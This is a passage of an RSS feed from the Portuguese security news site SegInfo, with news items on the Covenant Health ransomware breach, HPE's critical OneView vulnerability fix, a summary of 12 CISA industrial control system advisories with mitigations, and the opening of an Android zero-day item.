		<guid isPermaLink="false">https://seginfo.com.br/?p=73930</guid>

					<description><![CDATA[<p>A Covenant Health, Inc., organização de saúde sediada em Andover, no estado de Massachusetts (EUA), comunicou às autoridades que uma violação de dados identificada em maio de 2025 impactou mais de 478 mil indivíduos. A instituição oferece serviços de saúde em mais de uma dezena de unidades distribuídas pelos estados de Massachusetts, Maine, New Hampshire,&#8230; <span class="excerpt-more"><a href="https://seginfo.com.br/2026/01/02/violacao-de-dados-na-covenant-health-afeta-mais-de-478-mil-pessoas/">Read More</a></span></p>
<p>The post <a href="https://seginfo.com.br/2026/01/02/violacao-de-dados-na-covenant-health-afeta-mais-de-478-mil-pessoas/">Violação de dados na Covenant Health afeta mais de 478 mil pessoas</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="1024" height="585" src="https://seginfo.com.br/wp-content/uploads/2026/01/AdobeStock_1766403415-1024x585.jpeg" alt="" class="wp-image-73932" style="aspect-ratio:1.7504558478770513;width:754px;height:auto" srcset="https://seginfo.com.br/wp-content/uploads/2026/01/AdobeStock_1766403415-1024x585.jpeg 1024w, https://seginfo.com.br/wp-content/uploads/2026/01/AdobeStock_1766403415-300x171.jpeg 300w, https://seginfo.com.br/wp-content/uploads/2026/01/AdobeStock_1766403415-150x86.jpeg 150w, https://seginfo.com.br/wp-content/uploads/2026/01/AdobeStock_1766403415-768x439.jpeg 768w, https://seginfo.com.br/wp-content/uploads/2026/01/AdobeStock_1766403415-1536x878.jpeg 1536w, https://seginfo.com.br/wp-content/uploads/2026/01/AdobeStock_1766403415-2048x1170.jpeg 2048w, https://seginfo.com.br/wp-content/uploads/2026/01/AdobeStock_1766403415-1170x669.jpeg 1170w, https://seginfo.com.br/wp-content/uploads/2026/01/AdobeStock_1766403415-1792x1024.jpeg 1792w, https://seginfo.com.br/wp-content/uploads/2026/01/AdobeStock_1766403415-840x480.jpeg 840w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>


<p class="wp-block-paragraph">A Covenant Health, Inc., organização de saúde sediada em Andover, no estado de Massachusetts (EUA), comunicou às autoridades que uma violação de dados identificada em maio de 2025 impactou mais de <strong>478 mil indivíduos</strong>.</p>



<p class="wp-block-paragraph">A instituição oferece serviços de saúde em mais de uma dezena de unidades distribuídas pelos estados de Massachusetts, Maine, New Hampshire, Pensilvânia, Rhode Island e Vermont.</p>



<p class="wp-block-paragraph">De acordo com a notificação oficial, informações pessoais e dados de saúde de pacientes podem ter sido comprometidos em decorrência de um <strong>ataque ocorrido em 18 de maio de 2025</strong>. A intrusão foi detectada apenas no dia 26 do mesmo mês, e a investigação interna levou cerca de sete meses para ser concluída, sendo finalizada em dezembro.</p>



<p class="wp-block-paragraph">Inicialmente, em julho, a Covenant Health informou ao gabinete do procurador-geral do estado do Maine que aproximadamente <strong>7.800 pessoas</strong> haviam sido afetadas. No entanto, em uma atualização enviada à mesma autoridade em <strong>31 de dezembro</strong>, a organização revelou que o número real de vítimas chega a <strong>478.188 indivíduos</strong>.</p>



<p class="wp-block-paragraph">Incidentes desse tipo não são incomuns no setor de saúde, que frequentemente registra violações de dados envolvendo centenas de milhares — e, em alguns casos, milhões — de pessoas.</p>



<p class="wp-block-paragraph">Segundo a Covenant Health, os cibercriminosos tiveram acesso a informações sensíveis, como <strong>nome completo, data de nascimento, endereço, número do seguro social (SSN), número de prontuário médico, dados de planos de saúde e informações sobre tratamentos realizados</strong>.</p>



<p class="wp-block-paragraph">O ataque foi reivindicado pelo grupo de ransomware <strong>Qilin</strong>, que assumiu a autoria da ação em junho de 2025. Os criminosos alegaram ter exfiltrado mais de <strong>1,3 milhão de arquivos</strong>, totalizando cerca de <strong>850 GB de dados</strong>.</p>



<p class="wp-block-paragraph">Parte das informações supostamente roubadas já foi divulgada publicamente pelo grupo cibercriminoso, o que indica que <strong>nenhum resgate foi pago</strong> pela organização até o momento.</p>



<p class="wp-block-paragraph">Para saber mais, clique <strong><a href="https://www.securityweek.com/covenant-health-data-breach-impacts-478000-individuals/" target="_blank" rel="noreferrer noopener nofollow">aqui</a></strong>.</p>
<p>The post <a href="https://seginfo.com.br/2026/01/02/violacao-de-dados-na-covenant-health-afeta-mais-de-478-mil-pessoas/">Violação de dados na Covenant Health afeta mais de 478 mil pessoas</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">73930</post-id>	<dc:creator>contato@clavis.com.br (Clavis Segurança da Informação)</dc:creator></item>
		<item>
		<title>HPE corrige falha crítica em software de gestão de infraestrutura de TI</title>
		<link>https://seginfo.com.br/2025/12/26/hpe-corrige-falha-critica-em-software-de-gestao-de-infraestrutura-de-ti/</link>
		
		
		<pubDate>Fri, 26 Dec 2025 15:12:33 +0000</pubDate>
				<category><![CDATA[Artigos]]></category>
		<category><![CDATA[Notícia]]></category>
		<guid isPermaLink="false">https://seginfo.com.br/?p=73894</guid>

					<description><![CDATA[<p>A Hewlett Packard Enterprise (HPE) anunciou nesta semana a liberação de correções para uma vulnerabilidade crítica de execução remota de código em seu software de gerenciamento de infraestrutura de TI, o HPE OneView. Identificada como CVE-2025-37164 e com pontuação máxima de severidade (CVSS 10.0), a falha permite que atacantes não autenticados executem código arbitrário remotamente,&#8230; <span class="excerpt-more"><a href="https://seginfo.com.br/2025/12/26/hpe-corrige-falha-critica-em-software-de-gestao-de-infraestrutura-de-ti/">Read More</a></span></p>
<p>The post <a href="https://seginfo.com.br/2025/12/26/hpe-corrige-falha-critica-em-software-de-gestao-de-infraestrutura-de-ti/">HPE corrige falha crítica em software de gestão de infraestrutura de TI</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="1024" height="683" src="https://seginfo.com.br/wp-content/uploads/2025/12/AdobeStock_1641045634-1024x683.jpeg" alt="" class="wp-image-73897" style="aspect-ratio:1.4992888417882142;width:664px;height:auto" srcset="https://seginfo.com.br/wp-content/uploads/2025/12/AdobeStock_1641045634-1024x683.jpeg 1024w, https://seginfo.com.br/wp-content/uploads/2025/12/AdobeStock_1641045634-300x200.jpeg 300w, https://seginfo.com.br/wp-content/uploads/2025/12/AdobeStock_1641045634-150x100.jpeg 150w, https://seginfo.com.br/wp-content/uploads/2025/12/AdobeStock_1641045634-768x512.jpeg 768w, https://seginfo.com.br/wp-content/uploads/2025/12/AdobeStock_1641045634-1536x1024.jpeg 1536w, https://seginfo.com.br/wp-content/uploads/2025/12/AdobeStock_1641045634-2048x1365.jpeg 2048w, https://seginfo.com.br/wp-content/uploads/2025/12/AdobeStock_1641045634-1170x780.jpeg 1170w, https://seginfo.com.br/wp-content/uploads/2025/12/AdobeStock_1641045634-720x480.jpeg 720w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>


<p class="wp-block-paragraph">A Hewlett Packard Enterprise (HPE) anunciou nesta semana a liberação de correções para uma vulnerabilidade crítica de execução remota de código em seu software de gerenciamento de infraestrutura de TI, o <strong>HPE OneView</strong>.</p>



<p class="wp-block-paragraph">Identificada como <strong><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-37164" target="_blank" rel="noreferrer noopener">CVE-2025-37164</a></strong> e com <strong>pontuação máxima de severidade (CVSS 10.0)</strong>, a falha permite que atacantes <strong>não autenticados</strong> executem código arbitrário remotamente, o que representa um risco elevado para ambientes corporativos.</p>



<h3 class="wp-block-heading" id="h-o-que-se-sabe-sobre-a-vulnerabilidade">O que se sabe sobre a vulnerabilidade</h3>



<p class="wp-block-paragraph">De acordo com o comunicado oficial da HPE, a vulnerabilidade pode ser explorada sem a necessidade de credenciais válidas. Apesar de a empresa não ter confirmado exploração ativa da falha na internet, a recomendação é clara: <strong>os clientes devem aplicar as correções o mais rápido possível</strong>.</p>



<p class="wp-block-paragraph">O problema afeta <strong>todas as versões do HPE OneView até a 10.20</strong>. Para mitigar o risco, a HPE disponibilizou hotfixes específicos e orienta que ambientes que utilizam versões <strong>6.60.xx sejam atualizados primeiro para a versão 7.00</strong> antes da aplicação do patch de segurança. Além disso, <strong>reimagens do HPE Synergy Composer também devem ser atualizadas</strong>.</p>



<h3 class="wp-block-heading" id="h-detalhes-tecnicos-apontados-pela-rapid7">Detalhes técnicos apontados pela Rapid7</h3>



<p class="wp-block-paragraph">Embora a HPE não tenha divulgado detalhes técnicos aprofundados sobre a falha, a empresa de segurança <strong>Rapid7</strong> compartilhou informações relevantes após analisar a correção:</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p class="wp-block-paragraph">“Este hotfix aplica uma nova regra HTTP no servidor web do appliance para bloquear o acesso a um endpoint específico da API REST. Esse endpoint é o <code>/rest/id-pools/executeCommand</code>. Uma inspeção inicial do código do appliance indica que esse endpoint pode ser acessado sem autenticação. A Rapid7 avalia, com alto grau de confiança, que este seja o vetor de ataque utilizado para explorar a vulnerabilidade e alcançar a execução remota de código.”</p>
</blockquote>



<p class="wp-block-paragraph">A HPE creditou a descoberta da falha ao pesquisador <strong>Nguyen Quoc Khanh</strong>.</p>



<h3 class="wp-block-heading" id="h-onde-encontrar-as-correcoes">Onde encontrar as correções</h3>



<ul class="wp-block-list">
<li>Os <strong>hotfixes de segurança do appliance virtual HPE OneView</strong> estão disponíveis no portal oficial de suporte da HPE.</li>



<li>Já o <strong>hotfix de segurança relacionado ao HPE Synergy (CVE)</strong> pode ser obtido na página específica do produto.</li>
</ul>



<h3 class="wp-block-heading" id="h-outras-vulnerabilidades-corrigidas-pela-hpe">Outras vulnerabilidades corrigidas pela HPE</h3>



<p class="wp-block-paragraph">Além da falha crítica no OneView, a HPE também publicou correções para <strong>três vulnerabilidades adicionais</strong> em dependências utilizadas na plataforma <strong>HPE Telco Service Activator</strong>, voltada para provisionamento e ativação de serviços de telecomunicações.</p>



<p class="wp-block-paragraph">As falhas são rastreadas como:</p>



<ul class="wp-block-list">
<li><strong><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-49146" target="_blank" rel="noreferrer noopener">CVE-2025-49146</a></strong></li>



<li><strong><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-55163" target="_blank" rel="noreferrer noopener">CVE-2025-55163</a></strong></li>



<li><strong><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-7962" target="_blank" rel="noreferrer noopener">CVE-2025-7962</a></strong></li>
</ul>



<p class="wp-block-paragraph">Esses problemas afetam componentes amplamente utilizados, como o <strong>driver JDBC do PostgreSQL (PgJDBC)</strong>, o framework de rede <strong>Netty</strong> e o <strong>Jakarta Mail</strong>. Segundo a HPE, a exploração dessas vulnerabilidades poderia resultar em <strong>bypass de autenticação, negação de serviço (DoS)</strong> e <strong>injeção CRLF (Carriage Return Line Feed)</strong>.</p>



<p class="wp-block-paragraph">Todas as versões do <strong>HPE Telco Service Activator até a 10.3.2</strong> são impactadas. As correções foram incluídas na <strong>versão 10.3.3</strong> da plataforma. Até o momento, <strong>não há indícios de exploração ativa dessas falhas</strong>.</p>



<h3 class="wp-block-heading" id="h-consideracoes-finais">Considerações finais</h3>



<p class="wp-block-paragraph">Vulnerabilidades com severidade crítica e exploração sem autenticação reforçam a importância de <strong>gestão contínua de patches, monitoramento de ativos e resposta rápida a alertas de segurança</strong>. Organizações que utilizam soluções da HPE devem revisar seus ambientes, aplicar as atualizações recomendadas e garantir que boas práticas de segurança estejam sendo seguidas.</p>



<p class="wp-block-paragraph">Manter a infraestrutura atualizada não é apenas uma recomendação técnica, mas uma medida essencial para a continuidade e a segurança do negócio.</p>



<p class="wp-block-paragraph">Para saber mais, clique <strong><a href="https://www.securityweek.com/hpe-patches-critical-flaw-in-it-infrastructure-management-software/" target="_blank" rel="noreferrer noopener nofollow">aqui</a></strong>.</p>
<p>The post <a href="https://seginfo.com.br/2025/12/26/hpe-corrige-falha-critica-em-software-de-gestao-de-infraestrutura-de-ti/">HPE corrige falha crítica em software de gestão de infraestrutura de TI</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">73894</post-id>	<dc:creator>contato@clavis.com.br (Clavis Segurança da Informação)</dc:creator></item>
		<item>
		<title>CISA divulga 12 alertas de segurança para sistemas de controle industrial (ICS)</title>
		<link>https://seginfo.com.br/2025/12/12/cisa-divulga-12-alertas-de-seguranca-para-sistemas-de-controle-industrial-ics/</link>
		
		
		<pubDate>Fri, 12 Dec 2025 20:06:01 +0000</pubDate>
				<category><![CDATA[Uncategorized]]></category>
		<guid isPermaLink="false">https://seginfo.com.br/?p=73814</guid>

					<description><![CDATA[<p>A CISA (Cybersecurity and Infrastructure Security Agency) divulgou recentemente 12 novos avisos de segurança voltados a Sistemas de Controle Industrial (ICS). Os alertas trazem informações atualizadas sobre vulnerabilidades, falhas exploráveis e riscos operacionais que afetam soluções amplamente utilizadas em ambientes industriais, de energia, automação predial e saúde. Esses avisos são fundamentais para que organizações avaliem&#8230; <span class="excerpt-more"><a href="https://seginfo.com.br/2025/12/12/cisa-divulga-12-alertas-de-seguranca-para-sistemas-de-controle-industrial-ics/">Read More</a></span></p>
<p>The post <a href="https://seginfo.com.br/2025/12/12/cisa-divulga-12-alertas-de-seguranca-para-sistemas-de-controle-industrial-ics/">CISA divulga 12 alertas de segurança para sistemas de controle industrial (ICS)</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="1024" height="574" src="https://seginfo.com.br/wp-content/uploads/2025/12/AdobeStock_1710583397-1024x574.jpeg" alt="CISA 12 alertas para sistemas de controle industrial (ICS)" class="wp-image-73819" style="width:732px;height:auto" srcset="https://seginfo.com.br/wp-content/uploads/2025/12/AdobeStock_1710583397-1024x574.jpeg 1024w, https://seginfo.com.br/wp-content/uploads/2025/12/AdobeStock_1710583397-300x168.jpeg 300w, https://seginfo.com.br/wp-content/uploads/2025/12/AdobeStock_1710583397-150x84.jpeg 150w, https://seginfo.com.br/wp-content/uploads/2025/12/AdobeStock_1710583397-768x430.jpeg 768w, https://seginfo.com.br/wp-content/uploads/2025/12/AdobeStock_1710583397-1536x861.jpeg 1536w, https://seginfo.com.br/wp-content/uploads/2025/12/AdobeStock_1710583397-2048x1148.jpeg 2048w, https://seginfo.com.br/wp-content/uploads/2025/12/AdobeStock_1710583397-1170x656.jpeg 1170w, https://seginfo.com.br/wp-content/uploads/2025/12/AdobeStock_1710583397-1827x1024.jpeg 1827w, https://seginfo.com.br/wp-content/uploads/2025/12/AdobeStock_1710583397-856x480.jpeg 856w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>


<p class="wp-block-paragraph">A <strong>CISA (Cybersecurity and Infrastructure Security Agency)</strong> divulgou recentemente <strong>12 novos avisos de segurança voltados a Sistemas de Controle Industrial (ICS)</strong>. Os alertas trazem informações atualizadas sobre <strong>vulnerabilidades, falhas exploráveis e riscos operacionais</strong> que afetam soluções amplamente utilizadas em ambientes industriais, de energia, automação predial e saúde.</p>



<p class="wp-block-paragraph">Esses avisos são fundamentais para que organizações avaliem sua <strong>superfície de ataque</strong>, entendam os <strong>impactos potenciais</strong> e adotem <strong>medidas de mitigação adequadas</strong> para reduzir riscos cibernéticos.</p>



<p class="wp-block-paragraph">A seguir, resumimos os principais pontos de cada advisory.</p>



<h2 class="wp-block-heading" id="h-johnson-controls-istar-icsa-25-345-01">Johnson Controls iSTAR (ICSA-25-345-01)</h2>



<p class="wp-block-paragraph"><strong>Resumo do sistema</strong><br>O Johnson Controls iSTAR é um controlador amplamente utilizado em sistemas de <strong>controle de acesso físico</strong> e automação predial.</p>



<p class="wp-block-paragraph"><strong>Avaliação de risco</strong><br>As vulnerabilidades identificadas apresentam <strong>risco médio a alto</strong>, especialmente em ambientes conectados à rede corporativa ou à internet.</p>



<p class="wp-block-paragraph"><strong>Detalhes técnicos</strong><br>As falhas envolvem problemas de validação inadequada de entradas e controle de autenticação, que podem permitir <strong>acesso não autorizado</strong> ou manipulação de funções do sistema.</p>



<p class="wp-block-paragraph"><strong>Mitigações recomendadas</strong></p>



<ul class="wp-block-list">
<li>• Aplicação imediata de patches fornecidos pelo fabricante</li>



<li>• Restrição de acesso à interface de gerenciamento</li>



<li>• Segmentação de rede para isolar sistemas de controle de acesso</li>
</ul>



<h2 class="wp-block-heading" id="h-johnson-controls-istar-ultra-icsa-25-345-02">Johnson Controls iSTAR Ultra (ICSA-25-345-02)</h2>



<p class="wp-block-paragraph"><strong>Resumo do sistema</strong><br>Versão avançada do iSTAR, utilizada em ambientes críticos que exigem maior escalabilidade e integração.</p>



<p class="wp-block-paragraph"><strong>Avaliação de risco</strong><br>Classificado como <strong>alto impacto potencial</strong>, pois o sistema é comumente empregado em infraestruturas sensíveis.</p>



<p class="wp-block-paragraph"><strong>Detalhes técnicos</strong><br>As vulnerabilidades podem permitir <strong>execução de comandos não autorizados</strong> e comprometimento da integridade do sistema.</p>



<p class="wp-block-paragraph"><strong>Mitigações recomendadas</strong></p>



<ul class="wp-block-list">
<li>• Atualização para versões corrigidas</li>



<li>• Monitoramento contínuo de logs</li>



<li>• Desativação de serviços não utilizados</li>
</ul>



<h2 class="wp-block-heading" id="h-azeotech-daqfactory-icsa-25-345-03">AzeoTech DAQFactory (ICSA-25-345-03)</h2>



<p class="wp-block-paragraph"><strong>Resumo do sistema</strong><br>DAQFactory é um software SCADA/HMI utilizado para <strong>aquisição de dados e controle industrial</strong>.</p>



<p class="wp-block-paragraph"><strong>Avaliação de risco</strong><br>Risco <strong>médio</strong>, com possibilidade de escalonamento dependendo do contexto operacional.</p>



<p class="wp-block-paragraph"><strong>Detalhes técnicos</strong><br>As falhas envolvem <strong>tratamento inadequado de entradas e permissões</strong>, podendo levar a falhas de disponibilidade ou execução indevida de ações.</p>



<p class="wp-block-paragraph"><strong>Mitigações recomendadas</strong></p>



<ul class="wp-block-list">
<li>• Atualizar o software</li>



<li>• Limitar acesso de usuários</li>



<li>• Executar o sistema em ambientes segregados</li>
</ul>



<h2 class="wp-block-heading" id="h-siemens-iam-client-icsa-25-345-04">Siemens IAM Client (ICSA-25-345-04)</h2>



<p class="wp-block-paragraph"><strong>Resumo do sistema</strong><br>Cliente de gerenciamento de identidade e acesso utilizado em soluções industriais da Siemens.</p>



<p class="wp-block-paragraph"><strong>Avaliação de risco</strong><br>Risco <strong>médio</strong>, com impacto direto na <strong>gestão de identidades industriais</strong>.</p>



<p class="wp-block-paragraph"><strong>Detalhes técnicos</strong><br>As vulnerabilidades podem permitir <strong>bypass de autenticação</strong> ou falhas no controle de privilégios.</p>



<p class="wp-block-paragraph"><strong>Mitigações recomendadas</strong></p>



<ul class="wp-block-list">
<li>• Aplicação de correções de segurança</li>



<li>• Reforço de políticas de acesso</li>



<li>• Uso de autenticação multifator quando possível</li>
</ul>



<h2 class="wp-block-heading" id="h-siemens-advanced-licensing-salt-toolkit-icsa-25-345-05">Siemens Advanced Licensing (SALT) Toolkit (ICSA-25-345-05)</h2>



<p class="wp-block-paragraph"><strong>Resumo do sistema</strong><br>Ferramenta responsável pelo <strong>gerenciamento de licenças</strong> de softwares industriais Siemens.</p>



<p class="wp-block-paragraph"><strong>Avaliação de risco</strong><br>Risco <strong>baixo a médio</strong>, com impacto principalmente operacional.</p>



<p class="wp-block-paragraph"><strong>Detalhes técnicos</strong><br>Falhas podem permitir manipulação de arquivos de licença ou interrupção de serviços associados.</p>



<p class="wp-block-paragraph"><strong>Mitigações recomendadas</strong></p>



<ul class="wp-block-list">
<li>• Atualização do toolkit</li>



<li>• Restrição de acesso administrativo</li>



<li>• Backup regular das configurações</li>
</ul>



<h2 class="wp-block-heading" id="h-siemens-sinema-remote-connect-server-icsa-25-345-06">Siemens SINEMA Remote Connect Server (ICSA-25-345-06)</h2>



<p class="wp-block-paragraph"><strong>Resumo do sistema</strong><br>Plataforma para <strong>acesso remoto seguro</strong> a ambientes industriais.</p>



<p class="wp-block-paragraph"><strong>Avaliação de risco</strong><br><strong>Alto risco</strong>, pois envolve conectividade remota a sistemas críticos.</p>



<p class="wp-block-paragraph"><strong>Detalhes técnicos</strong><br>As vulnerabilidades podem permitir <strong>acesso remoto não autorizado</strong> ou interceptação de comunicações.</p>



<p class="wp-block-paragraph"><strong>Mitigações recomendadas</strong></p>



<ul class="wp-block-list">
<li>• Atualização imediata</li>



<li>• Restrição de acesso remoto</li>



<li>• Uso de VPNs e autenticação forte</li>
</ul>



<h2 class="wp-block-heading" id="h-siemens-building-x-security-manager-edge-controller-icsa-25-345-07">Siemens Building X – Security Manager Edge Controller (ICSA-25-345-07)</h2>



<p class="wp-block-paragraph"><strong>Resumo do sistema</strong><br>Controlador utilizado em soluções de <strong>segurança e automação predial</strong>.</p>



<p class="wp-block-paragraph"><strong>Avaliação de risco</strong><br>Risco <strong>médio</strong>, com potencial impacto físico e operacional.</p>



<p class="wp-block-paragraph"><strong>Detalhes técnicos</strong><br>As falhas afetam mecanismos de autenticação e gerenciamento de sessões.</p>



<p class="wp-block-paragraph"><strong>Mitigações recomendadas</strong></p>



<ul class="wp-block-list">
<li>• Aplicar patches</li>



<li>• Isolar o controlador da internet</li>



<li>• Monitorar acessos suspeitos</li>
</ul>



<h2 class="wp-block-heading" id="h-siemens-energy-services-icsa-25-345-08">Siemens Energy Services (ICSA-25-345-08)</h2>



<p class="wp-block-paragraph"><strong>Resumo do sistema</strong><br>Soluções voltadas à <strong>gestão e serviços de energia</strong>.</p>



<p class="wp-block-paragraph"><strong>Avaliação de risco</strong><br><strong>Alto impacto</strong>, especialmente em ambientes de infraestrutura crítica.</p>



<p class="wp-block-paragraph"><strong>Detalhes técnicos</strong><br>As vulnerabilidades podem permitir manipulação de dados operacionais ou interrupção de serviços.</p>



<p class="wp-block-paragraph"><strong>Mitigações recomendadas</strong></p>



<ul class="wp-block-list">
<li>• Atualizações de segurança</li>



<li>• Segmentação de rede</li>



<li>• Monitoramento contínuo</li>
</ul>



<h2 class="wp-block-heading" id="h-siemens-gridscale-x-prepay-icsa-25-345-09">Siemens Gridscale X Prepay (ICSA-25-345-09)</h2>



<p class="wp-block-paragraph"><strong>Resumo do sistema</strong><br>Sistema utilizado para <strong>gestão de energia pré-paga</strong>.</p>



<p class="wp-block-paragraph"><strong>Avaliação de risco</strong><br>Risco <strong>médio a alto</strong>, com impacto financeiro e operacional.</p>



<p class="wp-block-paragraph"><strong>Detalhes técnicos</strong><br>As falhas podem permitir alteração indevida de dados de cobrança ou consumo.</p>



<p class="wp-block-paragraph"><strong>Mitigações recomendadas</strong></p>



<ul class="wp-block-list">
<li>• Correção das vulnerabilidades</li>



<li>• Controles de acesso rigorosos</li>



<li>• Auditoria de logs</li>
</ul>



<h2 class="wp-block-heading" id="h-openplc-v3-icsa-25-345-10">OpenPLC_V3 (ICSA-25-345-10)</h2>



<p class="wp-block-paragraph"><strong>Resumo do sistema</strong><br>OpenPLC é um <strong>controlador lógico programável open source</strong>, amplamente usado em ambientes educacionais e industriais.</p>



<p class="wp-block-paragraph"><strong>Avaliação de risco</strong><br>Risco <strong>alto</strong> em ambientes produtivos expostos à rede.</p>



<p class="wp-block-paragraph"><strong>Detalhes técnicos</strong><br>Vulnerabilidades incluem <strong>falta de autenticação robusta e validação de comandos</strong>, possibilitando controle não autorizado.</p>



<p class="wp-block-paragraph"><strong>Mitigações recomendadas</strong></p>



<ul class="wp-block-list">
<li>• Executar apenas em redes isoladas</li>



<li>• Implementar controles de acesso adicionais</li>



<li>• Atualizar para versões corrigidas</li>
</ul>



<h2 class="wp-block-heading" id="h-grassroots-dicom-gdcm-icsma-25-345-01">Grassroots DICOM (GDCM) (ICSMA-25-345-01)</h2>



<p class="wp-block-paragraph"><strong>Resumo do sistema</strong><br>Biblioteca utilizada para manipulação de <strong>imagens médicas no padrão DICOM</strong>.</p>



<p class="wp-block-paragraph"><strong>Avaliação de risco</strong><br>Risco <strong>médio</strong>, especialmente em ambientes hospitalares.</p>



<p class="wp-block-paragraph"><strong>Detalhes técnicos</strong><br>Falhas podem permitir <strong>negação de serviço ou corrupção de dados</strong> ao processar arquivos maliciosos.</p>



<p class="wp-block-paragraph"><strong>Mitigações recomendadas</strong></p>



<ul class="wp-block-list">
<li>Atualização da biblioteca</li>



<li>Validação de arquivos de entrada</li>



<li>Monitoramento de aplicações dependentes</li>
</ul>



<h2 class="wp-block-heading" id="h-varex-imaging-software-de-imagem-odontologica-panoramica-icsma-25-345-02">Varex Imaging – Software de imagem odontológica panorâmica (ICSMA-25-345-02)</h2>



<p class="wp-block-paragraph"><strong>Resumo do sistema</strong><br>Software utilizado para <strong>imagens odontológicas panorâmicas</strong>.</p>



<p class="wp-block-paragraph"><strong>Avaliação de risco</strong><br>Risco <strong>médio</strong>, com impacto na disponibilidade e integridade de exames.</p>



<p class="wp-block-paragraph"><strong>Detalhes técnicos</strong><br>As vulnerabilidades envolvem falhas no processamento de arquivos e controle de memória.</p>



<p class="wp-block-paragraph"><strong>Mitigações recomendadas</strong></p>



<ul class="wp-block-list">
<li>• Aplicação de patches</li>



<li>• Restrição de acesso ao sistema</li>



<li>• Uso de ambientes controlados</li>
</ul>



<h2 class="wp-block-heading" id="h-consideracoes-finais">Considerações finais</h2>



<p class="wp-block-paragraph">Os alertas divulgados pela CISA reforçam a importância de <strong>gestão contínua de vulnerabilidades em ambientes ICS</strong>, especialmente em setores como energia, automação predial e saúde. A adoção de <strong>boas práticas de segurança</strong>, aliada à aplicação rápida de correções e à segmentação de redes, é essencial para reduzir riscos e manter a resiliência operacional.</p>



<p class="wp-block-paragraph">A <strong>Clavis</strong> apoia organizações na <strong>avaliação de riscos, implementação de controles de segurança e adequação às melhores práticas para ambientes industriais e críticos</strong>, fortalecendo a postura de segurança frente às ameaças cibernéticas atuais. Você pode conferir mais sobre IoT no artigo: <a href="https://clavis.com.br/blog/ciberseguranca-em-infraestruturas-criticas/" target="_blank" rel="noreferrer noopener">Clavis, UNIFEI e Claroty: parceria pela cibersegurança em infraestruturas críticas</a>. Saiba mais <strong><a href="https://clavis.com.br/" target="_blank" rel="noreferrer noopener">clicando aqui</a></strong> e entrando em contato com um <strong>especialista da Clavis</strong>.</p>



<p class="wp-block-paragraph">Para saber mais, <a href="https://www.cisa.gov/news-events/alerts/2025/12/11/cisa-releases-12-industrial-control-systems-advisories" target="_blank" rel="noreferrer noopener nofollow">clique aqui</a>.</p>
<p>The post <a href="https://seginfo.com.br/2025/12/12/cisa-divulga-12-alertas-de-seguranca-para-sistemas-de-controle-industrial-ics/">CISA divulga 12 alertas de segurança para sistemas de controle industrial (ICS)</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">73814</post-id>	<dc:creator>contato@clavis.com.br (Clavis Segurança da Informação)</dc:creator></item>
		<item>
		<title>Google corrige falhas zero-day em atualização de segurança do Android de dezembro de 2025</title>
		<link>https://seginfo.com.br/2025/12/05/google-corrige-falhas-zero-day-em-atualizacao-de-seguranca-do-android-de-dezembro-de-2025/</link>
		
		
		<pubDate>Fri, 05 Dec 2025 19:14:42 +0000</pubDate>
				<category><![CDATA[Notícia]]></category>
		<guid isPermaLink="false">https://seginfo.com.br/?p=73770</guid>

					<description><![CDATA[<p>A atualização de segurança de dezembro de 2025 do Android, liberada pelo Google trouxe correções importantes para os usuários do sistema operacional — incluindo duas falhas zero-day que, segundo a empresa, já estavam sendo exploradas em ataques direcionados. As vulnerabilidades, identificadas como CVE-2025-48633 e CVE-2025-48572, afetam o componente Framework da plataforma. De acordo com o&#8230; <span class="excerpt-more"><a href="https://seginfo.com.br/2025/12/05/google-corrige-falhas-zero-day-em-atualizacao-de-seguranca-do-android-de-dezembro-de-2025/">Read More</a></span></p>
<p>The post <a href="https://seginfo.com.br/2025/12/05/google-corrige-falhas-zero-day-em-atualizacao-de-seguranca-do-android-de-dezembro-de-2025/">Google corrige falhas zero-day em atualização de segurança do Android de dezembro de 2025</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wp-block-image">
